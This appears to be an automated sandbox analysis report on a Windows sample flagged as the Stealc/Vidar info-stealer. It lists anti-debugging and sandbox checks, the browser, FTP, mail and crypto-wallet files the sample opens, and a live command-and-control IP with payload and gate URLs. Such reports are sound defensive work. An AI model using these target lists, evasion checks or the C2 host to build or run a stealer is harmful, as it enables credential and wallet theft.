Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2359595891.0000000000703000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CBKJEGCB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: CBKJEGCB.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: CBKJEGCB.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: CBKJEGCB.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: CBKJEGCB.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: CBKJEGCB.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: CBKJEGCB.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: CBKJEGCB.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: CBKJEGCB.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: CBKJEGCB.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: CBKJEGCB.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: CBKJEGCB.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: CBKJEGCB.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.2360250459.0000000000F51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware^
Source: CBKJEGCB.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: CBKJEGCB.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CBKJEGCB.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: CBKJEGCB.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2359595891.0000000000703000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CBKJEGCB.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: CBKJEGCB.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003245C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003245C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00339860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00339750 mov eax, dword ptr fs:[00000030h]

0_2_00339750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00337850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00337850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C68B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00339600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00339600

Source: file.exe, file.exe, 00000000.00000002.2359595891.0000000000703000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: \|f5$Program Manager
Source: file.exe, 00000000.00000002.2359595891.0000000000703000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: o\|f5$Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B341 cpuid

0_2_6C68B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00337B90

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00336920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00336920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00337850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00337850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00337A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00337A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2359171753.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2086620561.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2359171753.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2086620561.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted Domains

Name	IP	Active
206.23.85.13.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
